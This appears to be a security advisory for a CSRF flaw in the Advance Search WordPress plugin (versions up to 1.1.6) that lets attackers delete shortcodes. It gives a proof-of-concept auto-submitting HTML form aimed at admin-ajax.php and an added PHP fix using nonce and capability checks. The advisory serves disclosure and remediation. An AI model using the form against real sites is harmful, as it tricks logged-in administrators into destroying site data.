wpexploit | Bob Matyas | WPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2
History: Mar 25, 2024 - 12:00 a.m.

Advance Search <= 1.1.6 - Shortcode Deletion via CSRF

Tags: cross-site request forgery, html form, security validation

AI Score: 6.8 Medium (Confidence: Low)

EPSS: 0.0004 Low (Percentile: 9.2%)

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks.

Make a logged-in admin open the following HTML (replace `__FORM_ID__` with a valid ID):

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
        <input type="hidden" name="ajax_type" value="delete_search">
        <input type="hidden" name="security" value="123">
        <input type="hidden" name="form_id" value="__FORM_ID__">
        <input type="hidden" name="search_form_name" value="">
        <input type="submit" value="Submit Request">
    </form>
</body>
```

The `security` field isn't validated and the shortcode is deleted.
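
The server-side fix for the missing check, as an added example rather than the plugin's own code: the handler for the `WPAS_Advanced_Search_extra_ajax` action verifies the `security` field as a WordPress nonce and checks the caller's capability before deleting anything. The nonce action `wpas_extra_ajax`, the `wpas_example_*` function names, the `manage_options` capability and the option-based storage are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. Hypothetical: nonce action
// 'wpas_extra_ajax', all wpas_example_* names, option 'wpas_example_forms'.

// Register only the authenticated hook; no wp_ajax_nopriv_ counterpart.
add_action( 'wp_ajax_WPAS_Advanced_Search_extra_ajax', 'wpas_example_extra_ajax' );

// Emit the nonce inside the admin form so legitimate requests carry it.
function wpas_example_nonce_field() {
    return wp_nonce_field( 'wpas_extra_ajax', 'security', false, false );
}

function wpas_example_extra_ajax() {
    // 1. CSRF: `security` must be a nonce minted for this user and action.
    //    With $die = false the call returns false instead of exiting.
    if ( ! check_ajax_referer( 'wpas_extra_ajax', 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a nonce shows intent, not privilege (assumed capability).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input handling for the fields used by the request on this page.
    $ajax_type = isset( $_POST['ajax_type'] ) ? sanitize_key( wp_unslash( $_POST['ajax_type'] ) ) : '';
    $form_id   = isset( $_POST['form_id'] ) ? sanitize_text_field( wp_unslash( $_POST['form_id'] ) ) : '';

    if ( 'delete_search' !== $ajax_type || '' === $form_id ) {
        wp_send_json_error( array( 'message' => 'Bad request.' ), 400 );
    }

    if ( ! wpas_example_delete_search( $form_id ) ) {
        wp_send_json_error( array( 'message' => 'Unknown form ID.' ), 404 );
    }
    wp_send_json_success( array( 'deleted' => $form_id ) );
}

// Hypothetical storage: search forms kept as an array in a single option.
function wpas_example_delete_search( $form_id ) {
    $forms = get_option( 'wpas_example_forms', array() );
    if ( ! isset( $forms[ $form_id ] ) ) {
        return false;
    }
    unset( $forms[ $form_id ] );
    return update_option( 'wpas_example_forms', $forms );
}
```

With this check in place, the auto-submitting form above is answered with HTTP 403, because the fixed value `123` is not a nonce issued to the admin's session.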
